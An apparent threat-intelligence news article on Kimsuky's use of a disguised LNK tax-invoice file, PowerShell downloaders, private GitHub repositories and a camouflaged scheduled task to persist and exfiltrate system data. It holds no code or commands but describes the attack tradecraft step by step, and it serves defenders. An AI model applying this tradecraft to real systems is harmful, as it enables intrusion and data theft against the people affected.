Kimsuky Hackers Exploit Weaponized LNK Files on GitHub for Malware Distribution

The North Korea-backed APT group Kimsuky has significantly advanced its cyber operations by leveraging GitHub repositories for malware delivery and data exfiltration. This evolution in their attack methodology highlights the group’s increasing proficiency in exploiting legitimate cloud infrastructure to bypass traditional security measures while ensuring persistent access to compromised systems. The attack chain initiates with a malicious ZIP archive that contains an LNK file disguised as an electronic tax invoice (전자세금계산서.pdf.lnk). When executed, this weaponised shortcut triggers a PowerShell command that downloads and executes additional malicious scripts from GitHub repositories controlled by the attackers. The initial payload lays the groundwork for systematic data collection and sustains long-term persistence on infected systems. S2W researchers identified nine private GitHub repositories linked to this campaign, including Group_0717, Group_0721, Test, Hometax, and Group_0803. The threat actors embedded hardcoded GitHub Private Tokens within their PowerShell scripts to access these repositories, showcasing meticulous operational security planning.

The malware’s persistence mechanism exemplifies a sophisticated strategy for maintaining long-term access. Upon initial infection, the main.ps1 script generates a file named MicrosoftEdgeUpdate.ps1 in the %AppData% directory and sets up a scheduled task titled “BitLocker MDM Policy RefreshDBHDFE12-496SDF-Q48D-SDEF-1865BCAD7E00.” This task executes every 30 minutes after an initial 5-minute delay, establishing an automated system for retrieving and executing updated PowerShell scripts from the GitHub repository. The malware utilises a dynamic script management system that timestamps infected systems and creates custom folders for data exfiltration. The PowerShell payload downloads a file named real.txt from the repository, replaces placeholder strings with timestamped values (ntxBill_MMdd_HHmm), and re-uploads the modified script using a time-specific filename format. This approach enables attackers to monitor individual infections and manage multiple compromised systems concurrently. The information-stealing component gathers extensive system metadata, including IP addresses, boot times, operating system details, hardware specifications, device types, installation dates, and running processes. All collected data is compiled into log files and uploaded to the attackers’ repository under timestamped folders, forming an organised intelligence database for the threat actors. 

Categories: Cyber Operations, Malware Delivery, Data Exfiltration 

Tags: Kimsuky, Cyber Operations, GitHub Repositories, Malware Delivery, Data Exfiltration, PowerShell, Persistence Mechanism, Dynamic Script Management, Information Gathering, Threat Intelligence